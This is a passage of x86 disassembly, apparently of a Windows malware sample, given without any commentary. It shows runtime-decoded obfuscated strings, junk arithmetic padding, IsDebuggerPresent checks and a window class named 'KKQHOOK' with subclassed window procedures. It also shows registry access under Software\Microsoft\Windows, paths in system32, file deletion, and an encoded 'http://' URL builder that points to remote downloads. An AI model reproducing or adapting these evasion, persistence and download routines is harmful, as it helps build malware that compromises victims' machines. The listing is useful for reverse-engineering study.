mov ecx, 3
rep movsw
mov eax, [ebp+var_8]
mov edx, eax
inc edx
mov [ebp+var_8], edx
mov dl, [ebp+var_17]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408BA1
; ---------------------------------------------------------------------------
loc_408B70: ; CODE XREF: sub_408A61+95�j
; DATA XREF: .data:00445964�o
mov edi, [ebp+var_14]
and edi, 3
shl edi, 6
or edi, [ebp+var_4]
mov edx, edi
mov [ebp+var_17], dl
mov [ebp+var_30], 7FF8h
mov eax, [ebp+var_30]
mov edx, eax
add edx, eax
mov [ebp+var_30], edx
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
and [ebp+var_10], 0
loc_408BA1: ; CODE XREF: sub_408A61+86�j
; sub_408A61+8F�j ...
mov eax, [ebp+var_4]
mov [ebp+var_14], eax
loc_408BA7: ; CODE XREF: sub_408A61+6F�j
inc ebx
loc_408BA8: ; CODE XREF: sub_408A61+3B�j
cmp byte ptr [ebx], 0
jz short loc_408BB9
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_408AA1
loc_408BB9: ; CODE XREF: sub_408A61+14A�j
cmp byte ptr [ebx], 0
jnz short loc_408BE7
mov [ebp+var_22], 2AB1h
sub [ebp+var_22], 52DFh
mov eax, [ebp+var_8]
sub eax, [ebp+arg_4]
jmp short loc_408BEA
; ---------------------------------------------------------------------------
mov dword ptr [ebp-28h], 1FFAh
mov eax, 13D0h
mul dword ptr [ebp-28h]
mov [ebp+var_2C], eax
mov [ebp-28h], eax
loc_408BE7: ; CODE XREF: sub_408A61+15B�j
or eax, 0FFFFFFFFh
loc_408BEA: ; CODE XREF: sub_408A61+16F�j
pop edi
pop esi
pop ebx
leave
retn
sub_408A61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408BEF proc near ; CODE XREF: sub_408C98+2E�p
; sub_408C98+48�p ...
var_1009 = byte ptr -1009h
var_1003 = byte ptr -1003h
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_40C118
push ebx
push esi
push edi
mov [ebp+var_1], 0D7h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
push 5
push [ebp+arg_0]
call sub_40C410 ; GetWindow
mov ebx, eax
mov [ebp+var_4], 4FCh
inc [ebp+var_4]
loc_408C26: ; CODE XREF: sub_408BEF+A2�j
or ebx, ebx
jnz short loc_408C2E
xor eax, eax
jmp short loc_408C93
; ---------------------------------------------------------------------------
loc_408C2E: ; CODE XREF: sub_408BEF+39�j
call sub_40C1F4 ; GetProcessHeap
lea edi, [ebp+var_1009]
lea esi, aNF8 ; "=n`F8"
mov ecx, 3
rep movsw
push 0FFFh
lea eax, [ebp+var_1003]
push eax
push ebx
call sub_40C41C ; GetClassNameA
call sub_40C194 ; GetCurrentThreadId
mov eax, 8
sub eax, dword_43B094
push eax
push [ebp+arg_4]
lea eax, [ebp+var_1003]
push eax
call sub_40181E
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_408C87
mov eax, ebx
jmp short loc_408C93
; ---------------------------------------------------------------------------
loc_408C87: ; CODE XREF: sub_408BEF+92�j
push 2
push ebx
call sub_40C410 ; GetWindow
mov ebx, eax
jmp short loc_408C26
; ---------------------------------------------------------------------------
loc_408C93: ; CODE XREF: sub_408BEF+3D�j
; sub_408BEF+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_408BEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C98 proc near ; CODE XREF: sub_40ADF7+1C0�p
var_174 = dword ptr -174h
var_16F = byte ptr -16Fh
var_16C = dword ptr -16Ch
var_167 = byte ptr -167h
var_166 = byte ptr -166h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = byte ptr -158h
var_155 = dword ptr -155h
var_151 = byte ptr -151h
var_149 = word ptr -149h
var_147 = byte ptr -147h
var_142 = byte ptr -142h
var_141 = byte ptr -141h
var_140 = dword ptr -140h
var_13A = word ptr -13Ah
var_137 = byte ptr -137h
var_136 = word ptr -136h
var_134 = word ptr -134h
var_132 = word ptr -132h
var_12F = byte ptr -12Fh
var_12E = word ptr -12Eh
var_12C = dword ptr -12Ch
var_127 = byte ptr -127h
var_126 = byte ptr -126h
var_125 = byte ptr -125h
var_124 = dword ptr -124h
var_120 = word ptr -120h
var_11E = word ptr -11Eh
var_11C = dword ptr -11Ch
var_115 = byte ptr -115h
var_114 = word ptr -114h
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = dword ptr -10Ah
var_106 = dword ptr -106h
var_102 = byte ptr -102h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 174h
push ebx
push esi
push edi
mov [ebp+var_11E], 12F1h
add [ebp+var_11E], 5A6Ch
push 9
push offset aQuTXud ; "´Ÿ“¿’š•“„"
call sub_40129C
push eax
push [ebp+arg_0]
call sub_408BEF
mov ebx, eax
call sub_40C194 ; GetCurrentThreadId
push 8
push offset aIaQvxv ; "µˆ€œŸ‚•‚"
call sub_40129C
push eax
push ebx
call sub_408BEF
mov ds:dword_41C844, eax
mov [ebp+var_114], 6339h
movzx eax, [ebp+var_114]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_114], ax
push 0
push ds:dword_41C844
call sub_40C500 ; ShowWindow
mov [ebp+var_120], 455h
movzx eax, [ebp+var_120]
imul eax, 3CD3h
mov [ebp+var_120], ax
lea eax, [ebp+var_112]
push eax
push ebx
call sub_40C3F8 ; GetWindowRect
mov [ebp+var_115], 0E2h
movzx eax, [ebp+var_115]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_115], al
push 0
push ds:dword_41D928
push 0
push ebx
mov eax, [ebp+var_106]
sub eax, [ebp+var_10E]
push eax
mov eax, [ebp+var_10A]
sub eax, [ebp+var_112]
push eax
push 0
push 0
push 50800000h
push offset byte_446481
push offset aKkqhook ; "KKQHOOK"
push 200h
call sub_40C50C ; CreateWindowExA
mov ds:dword_41EBD4, eax
call sub_40C188 ; GetCurrentProcessId
push 6
push offset aGdD ; "£¤±¤¹³"
call sub_40129C
mov [ebp+var_15C], eax
push 19h
push offset dword_445D94
call sub_40129C
push 0
push ds:dword_41D928
push 0
push ds:dword_41EBD4
mov edi, dword_43B098
mov esi, edi
add esi, 2Ah
push esi
mov esi, [ebp+var_10A]
sub esi, [ebp+var_112]
sub esi, 64h
push esi
add edi, 2
push edi
push edi
push 50800000h
push eax
mov edi, [ebp+var_15C]
push edi
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_41C840, eax
call sub_40C218 ; GetTickCount
push 6
push offset aGdD ; "£¤±¤¹³"
call sub_40129C
push 0
push ds:dword_41D928
push 0
push ds:dword_41EBD4
mov edi, dword_43B098
add edi, 11Ah
push edi
mov edi, [ebp+var_10A]
sub edi, [ebp+var_112]
sub edi, 64h
push edi
mov edi, dword_43B098
add edi, 3Fh
push edi
mov edi, dword_43B094
add edi, 0Dh
push edi
push 50800009h
push offset byte_446481
push eax
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_42FCFC, eax
mov [ebp+var_124], 25F0h
sub [ebp+var_124], 78EFh
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 2BCh
push 0
push 0
mov eax, 1Ah
sub eax, dword_43B098
push eax
mov eax, dword_43B094
add eax, 0Dh
push eax
call sub_40C578 ; CreateFontA
mov [ebp+var_140], eax
mov [ebp+var_125], 1Ah
movzx eax, [ebp+var_125]
imul eax, 3B5Bh
mov [ebp+var_125], al
push 1
push [ebp+var_140]
push 30h
push ds:dword_41C840
call sub_40C4DC ; SendMessageA
call sub_40C1F4 ; GetProcessHeap
push 8
push offset aI_1 ; "³¿½²¿²¿¨"
call sub_40129C
push 0
push ds:dword_41D928
push 0
push ds:dword_42FCFC
mov edi, dword_43B098
add edi, 11Ah
push edi
mov edi, dword_43B098
add edi, 20h
push edi
mov edi, dword_43B094
add edi, 33h
push edi
mov edi, dword_43B098
add edi, 2
push edi
push 50800003h
push offset byte_446481
push eax
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_431E90, eax
mov [ebp+var_126], 83h
add [ebp+var_126], 1
push 8
push offset aI_1 ; "³¿½²¿²¿¨"
call sub_40129C
add esp, 48h
push 0
push ds:dword_41D928
push 0
push ds:dword_42FCFC
mov edi, dword_43B094
add edi, 125h
push edi
mov edi, dword_43B098
add edi, 2Ah
push edi
mov edi, dword_43B098
add edi, 28h
push edi
mov edi, dword_43B098
add edi, 40h
push edi
push 50800003h
push offset byte_446481
push eax
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_41D920, eax
mov [ebp+var_127], 0E2h
add [ebp+var_127], 0DBh
mov [ebp+var_2], 1
jmp loc_40907C
; ---------------------------------------------------------------------------
loc_408FDE: ; CODE XREF: sub_408C98+3EB�j
call sub_40C194 ; GetCurrentThreadId
lea edi, [ebp+var_16F]
lea esi, a5papg ; "*5pApG&"
movsd
movsd
push 4
push offset aE ; "ÕÞÂ…"
call sub_40129C
movzx edi, [ebp+var_2]
push edi
push eax
lea edi, [ebp+var_166]
push edi
call sub_40C6B0
lea eax, [ebp+var_166]
push eax
push 0
push 143h
push ds:dword_431E90
call sub_40C4DC ; SendMessageA
mov [ebp+var_167], 39h
sub [ebp+var_167], 0D0h
push 6
push offset aE_0 ; "ÂÀÕÞÂ…"
call sub_40129C
movzx edi, [ebp+var_2]
add edi, 4
push edi
push eax
lea edi, [ebp+var_166]
push edi
call sub_40C6B0
add esp, 28h
lea eax, [ebp+var_166]
push eax
push 0
push 143h
push ds:dword_41D920
call sub_40C4DC ; SendMessageA
call sub_40C1B8 ; RtlGetLastWin32Error
inc [ebp+var_2]
loc_40907C: ; CODE XREF: sub_408C98+341�j
movzx eax, [ebp+var_2]
cmp eax, 0Dh
jl loc_408FDE
push 6
push offset aGdD ; "£¤±¤¹³"
call sub_40129C
mov [ebp+var_160], eax
push 10h
push offset aIqevUsvfUeatxv ; "©Ÿ…‚Г‘‚”О…’•‚"
call sub_40129C
push 0
push ds:dword_41D928
push 0
push ds:dword_41EBD4
mov edi, dword_43B094
add edi, 9
push edi
mov edi, dword_43B094
add edi, 60h
push edi
mov edi, dword_43B098
add edi, 5Ch
push edi
mov edi, dword_43B094
add edi, 0BCh
push edi
push 50000000h
push eax
mov edi, [ebp+var_160]
push edi
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_413C98, eax
push 6
push offset aGdD ; "£¤±¤¹³"
call sub_40129C
mov [ebp+var_164], eax
push 0Fh
push offset aIasvsdsquFsdx ; "µˆ€™‚‘„™ŸžÐ”‘„•"
call sub_40129C
push 0
push ds:dword_41D928
push 0
push ds:dword_41EBD4
mov edi, dword_43B098
mov esi, 22h
sub esi, edi
push esi
mov edi, dword_43B098
add edi, 45h
push edi
mov edi, dword_43B098
add edi, 7Fh
push edi
mov edi, dword_43B098
add edi, 0B1h
push edi
push 50000000h
push eax
mov edi, [ebp+var_164]
push edi
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_431E88, eax
push 6
push offset aGdD ; "£¤±¤¹³"
call sub_40129C
mov [ebp-168h], eax
push 0Ch
push offset aDAQfx ; "±¤½Ð ¹¾Ý³Ÿ”•"
call sub_40129C
push 0
push ds:dword_41D928
push 0
push ds:dword_41EBD4
mov edi, dword_43B098
mov esi, 22h
sub esi, edi
push esi
mov edi, dword_43B098
add edi, 44h
push edi
mov edi, dword_43B098
add edi, 0A7h
push edi
mov edi, dword_43B098
add edi, 0B1h
push edi
push 50000000h
push eax
mov edi, [ebp-168h]
push edi
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_434148, eax
lea edi, [ebp+var_141]
lea esi, byte_445976
xor ecx, ecx
inc ecx
rep movsb
push 6
push offset aGdD ; "£¤±¤¹³"
call sub_40129C
mov [ebp+var_16C], eax
push 4Ah
push offset aEustXDqSedsqvs ; "¥ž‘’œ•Ð„ŸÐ‘…„˜Ÿ‚™Š•Þб¤½Ð ¹¾Ý³Ÿ”•Ð™ƒÐ‚•"...
call sub_40129C
push 0
push ds:dword_41D928
push 0
push ds:dword_41EBD4
mov edi, dword_43B094
add edi, 9
push edi
mov edi, dword_43B098
add edi, 1D2h
push edi
mov edi, dword_43B098
add edi, 0D4h
push edi
mov edi, dword_43B098
add edi, 0Ch
push edi
push 50000000h
push eax
mov edi, [ebp+var_16C]
push edi
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_431E8C, eax
mov [ebp+var_12C], 43EBh
inc [ebp+var_12C]
push 6
push offset aGdD ; "£¤±¤¹³"
call sub_40129C
mov [ebp-170h], eax
push 26h
push offset aAXsgxAsixUqvvx ; " œ•‘ƒ•Ð‘›•Ð“Ÿ‚‚•“„™ŸžƒÐ‘ž”Є‚‰Ð‘—‘™žÞ"
call sub_40129C
push 0
push ds:dword_41D928
push 0
push ds:dword_41EBD4
mov edi, dword_43B098
mov esi, 22h
sub esi, edi
push esi
mov edi, dword_43B098
add edi, 0EBh
push edi
mov edi, dword_43B094
add edi, 0F8h
push edi
mov edi, dword_43B094
add edi, 17h
push edi
push 50000000h
push eax
mov edi, [ebp-170h]
push edi
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_43937C, eax
call sub_40C1B8 ; RtlGetLastWin32Error
lea edi, [ebp+var_142]
lea esi, byte_445977
xor ecx, ecx
inc ecx
rep movsb
push offset byte_432F80
lea eax, [ebp+var_102]
push eax
call sub_40C6B0
add esp, 58h
call sub_40C1F4 ; GetProcessHeap
mov [ebp+var_3], 4
jmp short loc_40933E
; ---------------------------------------------------------------------------
loc_40932E: ; CODE XREF: sub_408C98+6AB�j
movzx eax, [ebp+var_3]
mov [ebp+eax+var_102], 78h
add [ebp+var_3], 1
loc_40933E: ; CODE XREF: sub_408C98+694�j
mov al, [ebp+var_3]
cmp al, 0Ch
jb short loc_40932E
mov [ebp+var_12E], 6F86h
inc [ebp+var_12E]
push 4
push offset aD ; "µ´¹¤"
call sub_40129C
push 0
push ds:dword_41D928
push 0
push ds:dword_42FCFC
mov edi, dword_43B098
add edi, 6
push edi
mov edi, dword_43B098
add edi, 70h
push edi
mov edi, dword_43B094
add edi, 0Dh
push edi
mov edi, dword_43B098
add edi, 2
push edi
push 50800800h
lea edi, [ebp+var_102]
push edi
push eax
push 200h
call sub_40C50C ; CreateWindowExA
mov ds:dword_41076C, eax
mov [ebp+var_11C], 97h
mov eax, [ebp+var_11C]
mov edx, eax
add edx, eax
mov [ebp+var_11C], edx
push 4
push offset aD ; "µ´¹¤"
call sub_40129C
push 0
push ds:dword_41D928
push 0
push ds:dword_42FCFC
mov edi, dword_43B094
add edi, 11h
push edi
mov edi, dword_43B098
add edi, 34h
push edi
mov edi, dword_43B094
add edi, 58h
push edi
mov edi, dword_43B094
add edi, 0Dh
push edi
push 50800000h
push offset byte_446481
push eax
push 200h
call sub_40C50C ; CreateWindowExA
mov ds:dword_41D918, eax
push 0
push 78h
push 0CCh
push eax
call sub_40C4DC ; SendMessageA
mov [ebp+var_12F], 39h
add [ebp+var_12F], 1
push 6
push offset aEdd ; "²¥¤¤¿¾"
call sub_40129C
mov [ebp+var_174], eax
push 16h
push offset aSuiUuxDqQudsue ; "³œ™“›Ð¿ž“•Ð¤ŸÐ³Ÿž„™ž…•"
call sub_40129C
add esp, 20h
push 0
push ds:dword_41D928
push 0
push ds:dword_41EBD4
mov edi, dword_43B098
add edi, 5
push edi
mov edi, dword_43B094
add edi, 94h
push edi
mov edi, dword_43B098
add edi, 12Eh
push edi
mov edi, dword_43B098
add edi, 0Ch
push edi
push 50800000h
push eax
mov edi, [ebp+var_174]
push edi
push 0
call sub_40C50C ; CreateWindowExA
mov ds:dword_43414C, eax
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 190h
push 0
push 0
mov eax, 18h
sub eax, dword_43B098
push eax
mov eax, dword_43B094
add eax, 9
push eax
call sub_40C578 ; CreateFontA
mov ebx, eax
push 1
push ebx
push 30h
push ds:dword_431E90
call sub_40C4DC ; SendMessageA
call sub_40C1B8 ; RtlGetLastWin32Error
push 1
push ebx
push 30h
push ds:dword_41D920
call sub_40C4DC ; SendMessageA
lea edi, [ebp+var_147]
lea esi, a6K ; "6#,K"
mov ecx, 5
rep movsb
push 1
push ebx
push 30h
push ds:dword_41076C
call sub_40C4DC ; SendMessageA
mov [ebp+var_132], 334h
add [ebp+var_132], 4DDCh
push 1
push ebx
push 30h
push ds:dword_41D918
call sub_40C4DC ; SendMessageA
mov [ebp+var_134], 31D4h
add [ebp+var_134], 70BBh
push 1
push ebx
push 30h
push ds:dword_431E88
call sub_40C4DC ; SendMessageA
mov [ebp+var_136], 723h
add [ebp+var_136], 5AB8h
push 1
push ebx
push 30h
push ds:dword_413C98
call sub_40C4DC ; SendMessageA
call sub_40C218 ; GetTickCount
push 1
push ebx
push 30h
push ds:dword_434148
call sub_40C4DC ; SendMessageA
call sub_40C188 ; GetCurrentProcessId
push 1
push ebx
push 30h
push ds:dword_43414C
call sub_40C4DC ; SendMessageA
call sub_40C188 ; GetCurrentProcessId
push 0FFFFFFFCh
push ds:dword_431E90
call sub_40C488 ; GetWindowLongA
mov ds:dword_41EAC4, eax
mov ax, word_44597D
mov [ebp+var_149], ax
push offset sub_40ACD5
push 0FFFFFFFCh
push ds:dword_431E90
call sub_40C494 ; SetWindowLongA
lea edi, [ebp+var_151]
lea esi, aRjhghl6 ; "RJHGHl6"
movsd
movsd
push 0FFFFFFFCh
push ds:dword_41D920
call sub_40C488 ; GetWindowLongA
mov ds:dword_41D91C, eax
push offset sub_40ACD5
push 0FFFFFFFCh
push ds:dword_41D920
call sub_40C494 ; SetWindowLongA
mov [ebp+var_137], 4Ch
add [ebp+var_137], 1
push 0FFFFFFFCh
push ds:dword_41076C
call sub_40C488 ; GetWindowLongA
mov ds:dword_40DFBC, eax
mov eax, dword_445987
mov [ebp+var_155], eax
push offset sub_40ACD5
push 0FFFFFFFCh
push ds:dword_41076C
call sub_40C494 ; SetWindowLongA
mov [ebp+var_13A], 62Dh
movzx eax, [ebp+var_13A]
imul eax, 6BB4h
mov [ebp+var_13A], ax
push 0FFFFFFFCh
push ds:dword_41D918
call sub_40C488 ; GetWindowLongA
mov ds:dword_413C94, eax
call sub_40C194 ; GetCurrentThreadId
push offset sub_40ACD5
push 0FFFFFFFCh
push ds:dword_41D918
call sub_40C494 ; SetWindowLongA
lea edi, [ebp+var_158]
lea esi, byte_44598B
mov ecx, 3
rep movsb
push ds:dword_431E90
call sub_40C428 ; SetFocus
call sub_40C224 ; GetVersion
pop edi
pop esi
pop ebx
leave
retn
sub_408C98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4096E4 proc near ; DATA XREF: sub_40A4E2+771�o
var_55DC = dword ptr -55DCh
var_55D5 = byte ptr -55D5h
var_55CF = byte ptr -55CFh
var_55CA = word ptr -55CAh
var_55C8 = word ptr -55C8h
var_55C5 = byte ptr -55C5h
var_55BE = byte ptr -55BEh
var_4714 = dword ptr -4714h
var_4710 = byte ptr -4710h
var_470F = byte ptr -470Fh
var_4708 = byte ptr -4708h
var_4700 = dword ptr -4700h
var_46FC = dword ptr -46FCh
var_46F8 = dword ptr -46F8h
var_46F4 = byte ptr -46F4h
var_46EC = dword ptr -46ECh
var_46E8 = dword ptr -46E8h
var_46E2 = word ptr -46E2h
var_46DF = byte ptr -46DFh
var_46DE = word ptr -46DEh
var_46DC = dword ptr -46DCh
var_46D6 = word ptr -46D6h
var_46D3 = byte ptr -46D3h
var_45D4 = byte ptr -45D4h
var_45D0 = dword ptr -45D0h
var_45CC = dword ptr -45CCh
var_45C8 = dword ptr -45C8h
var_45C3 = byte ptr -45C3h
var_45BF = byte ptr -45BFh
var_35DC = dword ptr -35DCh
var_35D8 = dword ptr -35D8h
var_35D2 = byte ptr -35D2h
var_35CA = byte ptr -35CAh
var_35C9 = byte ptr -35C9h
var_35C8 = dword ptr -35C8h
var_35C4 = dword ptr -35C4h
var_35C0 = dword ptr -35C0h
var_35BC = dword ptr -35BCh
var_35B7 = byte ptr -35B7h
var_25B8 = byte ptr -25B8h
var_25B3 = byte ptr -25B3h
var_15C4 = dword ptr -15C4h
var_15C0 = dword ptr -15C0h
var_15BA = byte ptr -15BAh
var_15B9 = byte ptr -15B9h
var_15B6 = word ptr -15B6h
var_15B4 = dword ptr -15B4h
var_115F = word ptr -115Fh
var_115D = byte ptr -115Dh
var_1155 = byte ptr -1155h
var_1150 = byte ptr -1150h
var_114C = word ptr -114Ch
var_1149 = byte ptr -1149h
var_1141 = byte ptr -1141h
var_1139 = byte ptr -1139h
var_1132 = byte ptr -1132h
var_112C = dword ptr -112Ch
var_1127 = byte ptr -1127h
var_1028 = dword ptr -1028h
var_1022 = word ptr -1022h
var_1020 = byte ptr -1020h
var_101F = byte ptr -101Fh
var_101E = byte ptr -101Eh
var_101D = byte ptr -101Dh
var_101C = word ptr -101Ch
var_1019 = byte ptr -1019h
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_100F = byte ptr -100Fh
var_F0B = byte ptr -0F0Bh
var_E0C = dword ptr -0E0Ch
var_E08 = byte ptr -0E08h
var_608 = dword ptr -608h
var_604 = dword ptr -604h
var_600 = byte ptr -600h
var_200 = byte ptr -200h
var_1FD = byte ptr -1FDh
var_1FB = byte ptr -1FBh
var_1A8 = byte ptr -1A8h
var_1A7 = byte ptr -1A7h
push ebp
mov ebp, esp
mov eax, 55DCh
call sub_40C118
push ebx
push esi
push edi
call sub_40C224 ; GetVersion
mov eax, dword_44598E
mov [ebp+var_112C+1], eax
lea edi, [ebp+var_1132]
lea esi, aXei? ; " xeI?<"
mov ecx, 7
rep movsb
lea edi, [ebp+var_1139]
lea esi, aZmbL ; "zMB%L "
mov ecx, 7
rep movsb
lea edi, [ebp+var_1141]
lea esi, aCdeDa ; "<Cde;Da"
movsd
movsd
lea edi, [ebp+var_1149]
lea esi, dword_4459A8
mov ecx, 2
rep movsd
call sub_40C218 ; GetTickCount
push eax
call sub_40C6BC
pop ecx
call sub_40C1F4 ; GetProcessHeap
loc_40975C: ; CODE XREF: sub_4096E4+D92�j
mov eax, 1Ah
sub eax, dword_43B098
push eax
lea eax, [ebp+var_F0B]
push eax
call sub_401719
mov [ebp+var_101C], 64C5h
sub [ebp+var_101C], 6938h
push 9
push offset aGmGFsd ; "Õƒ¬ÕƒÞ”‘„"
call sub_40129C
lea edi, [ebp+var_F0B]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_600]
push edi
call sub_40C6B0
lea eax, [ebp+var_600]
push eax
call sub_40352B
mov [ebp+var_101D], 1Ah
sub [ebp+var_101D], 0F5h
mov ax, word_4459B0
mov [ebp+var_114C+1], ax
push 9
push offset aSddaG ; "˜„„€ÊßßÕƒ"
call sub_40129C
mov edi, dword_43B0B0
push off_43B0B8[edi*4]
push eax
lea edi, [ebp+var_E08]
push edi
call sub_40C6B0
mov [ebp+var_101E], 5Ah
movzx eax, [ebp+var_101E]
imul eax, 4786h
mov [ebp+var_101E], al
push 1
push offset asc_445CA6 ; "ß"
call sub_40129C
mov edi, 13h
sub edi, dword_43B098
push edi
push eax
mov edi, dword_43B0B0
push off_43B0B8[edi*4]
call sub_40181E
add esp, 4Ch
cmp eax, 0FFFFh
jnz short loc_409863
push 9
push offset aZuxgAsa ; "߇“•ƒÞ€˜€"
call sub_40129C
push eax
lea edi, [ebp+var_E08]
push edi
call sub_40C6D4
add esp, 10h
loc_409863: ; CODE XREF: sub_4096E4+161�j
and [ebp+var_1018], 0
mov [ebp+var_1028], 4
call sub_40C194 ; GetCurrentThreadId
push 1Ah
push offset aGqcdzsvxmSuvqg ; "£Ÿ–„‡‘‚•¬½™“‚ŸƒŸ–„¬§™ž”Ÿ‡ƒ"
call sub_40129C
mov [ebp+var_15B4], eax
push 3
push offset aScu ; "™–“"
call sub_40129C
lea edi, [ebp+var_1150]
push edi
lea edi, [ebp+var_1028]
push edi
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp+var_15B4]
push edi
push 80000001h
call sub_4014AA
call sub_40C2B4 ; IsDebuggerPresent
lea edi, [ebp+var_1155]
lea esi, aJsz ; " jSZ"
mov ecx, 5
rep movsb
push 7
push offset aScuE ; "Ï™–“ÍÕ…"
call sub_40129C
push [ebp+var_1018]
push eax
lea edi, [ebp+var_1127]
push edi
call sub_40C6B0
mov [ebp+var_101F], 0B8h
movzx eax, [ebp+var_101F]
imul eax, 6FBDh
mov [ebp+var_101F], al
lea eax, [ebp+var_1127]
push eax
lea eax, [ebp+var_E08]
push eax
call sub_40C6D4
call sub_40C188 ; GetCurrentProcessId
push 1
push offset aB ; ""
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_E08]
push edi
push 0
call sub_4063A9
add esp, 6Ch
mov ebx, eax
call sub_40C194 ; GetCurrentThreadId
or ebx, ebx
jnz short loc_40999B
mov [ebp+var_15B6], 318Dh
movzx eax, [ebp+var_15B6]
imul eax, 240Eh
mov [ebp+var_15B6], ax
lea eax, [ebp+var_600]
push eax
call sub_4035A9
pop ecx
call sub_40C2B4 ; IsDebuggerPresent
jmp loc_40A383
; ---------------------------------------------------------------------------
loc_40999B: ; CODE XREF: sub_4096E4+281�j
and [ebp+var_1018], 0
push 1Ah
push offset aGqcdzsvxmSuvqg ; "£Ÿ–„‡‘‚•¬½™“‚ŸƒŸ–„¬§™ž”Ÿ‡ƒ"
call sub_40129C
mov [ebp-15B8h], eax
push 3
push offset aScu ; "™–“"
call sub_40129C
push 4
push 4
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp-15B8h]
push edi
push 80000001h
call sub_4015C0
mov [ebp+var_1020], 0F4h
movzx eax, [ebp+var_1020]
imul eax, 307Eh
mov [ebp+var_1020], al
push 0
lea eax, [ebp+var_600]
push eax
call sub_401AC1
add esp, 30h
mov [ebp+var_E0C], eax
or eax, eax
jz loc_40A383
mov [ebp+var_1022], 1FAh
add [ebp+var_1022], 144Fh
lea eax, [ebp+var_600]
push eax
call sub_40C3E0 ; DeleteFileA
lea edi, [ebp+var_115D]
lea esi, aEq ; "`<|'&eq"
movsd
movsd
lea eax, [ebp+var_600]
push eax
call sub_4035A9
pop ecx
and [ebp+var_608], 0
jmp loc_40A335
; ---------------------------------------------------------------------------
loc_409A5B: ; CODE XREF: sub_4096E4+C74�j
mov eax, dword_4459BF
mov [ebp+var_35BC+1], eax
cmp [ebp+var_200], 0
jz loc_40A335
call sub_40C194 ; GetCurrentThreadId
lea ecx, [ebp+var_200]
or eax, 0FFFFFFFFh
loc_409A81: ; CODE XREF: sub_4096E4+3A2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409A81
cmp eax, 5Ch
jb loc_40A335
mov [ebp+var_1A8], 0
push 0FFFh
lea eax, [ebp+var_25B8]
push eax
lea eax, [ebp+var_1A7]
push eax
call sub_408A61
push 0FFFh
lea eax, [ebp+var_35B7]
push eax
lea eax, [ebp+var_200]
push eax
call sub_408A61
add esp, 18h
call sub_40C218 ; GetTickCount
mov [ebp+var_15BA], 0
mov [ebp+var_15B9], 0
jmp short loc_409AFE
; ---------------------------------------------------------------------------
loc_409AE0: ; CODE XREF: sub_4096E4+433�j
movzx eax, [ebp+var_15B9]
lea edx, [ebp+eax+var_25B8]
movsx ecx, byte ptr [edx]
sub ecx, eax
mov eax, ecx
mov [edx], al
add [ebp+var_15B9], 1
loc_409AFE: ; CODE XREF: sub_4096E4+3FA�j
lea ecx, [ebp+var_25B8]
or eax, 0FFFFFFFFh
loc_409B07: ; CODE XREF: sub_4096E4+428�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409B07
movzx esi, [ebp+var_15B9]
cmp esi, eax
jb short loc_409AE0
call sub_40C1B8 ; RtlGetLastWin32Error
lea ecx, [ebp+var_25B8]
or eax, 0FFFFFFFFh
loc_409B27: ; CODE XREF: sub_4096E4+448�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409B27
lea esi, [ebp+var_35B7]
push esi
push eax
lea edi, [ebp+var_25B8]
push edi
call sub_4088C3
add esp, 0Ch
mov [ebp+var_35C0], eax
push 5
push offset aZagd ; "‡€ƒ„Ð"
call sub_40129C
add esp, 8
mov edi, 13h
sub edi, dword_43B098
push edi
push eax
lea edi, [ebp+var_25B8]
push edi
call sub_40181E
add esp, 0Ch
cmp eax, 0
jnz loc_409FD3
call sub_40C1B8 ; RtlGetLastWin32Error
mov eax, dword_4459C3
mov [ebp+var_46EC], eax
lea edi, [ebp+var_46F4]
lea esi, aQutqT ; "%Qutq t"
mov ecx, 8
rep movsb
lea eax, [ebp+var_25B3]
push eax
lea eax, [ebp+var_45C3]
push eax
call sub_40C138
mov [ebp+var_35C4], 0
mov [ebp+var_45C8], 4
lea eax, [ebp+var_45D4]
push eax
lea eax, [ebp+var_45C8]
push eax
lea eax, [ebp+var_35C4]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014AA
add esp, 18h
call sub_40C188 ; GetCurrentProcessId
push 1
push offset aB ; ""
call sub_40129C
add esp, 8
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
